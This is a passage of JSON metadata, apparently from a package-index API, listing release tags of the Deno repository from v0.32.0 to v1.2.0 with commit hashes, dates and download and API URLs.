"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/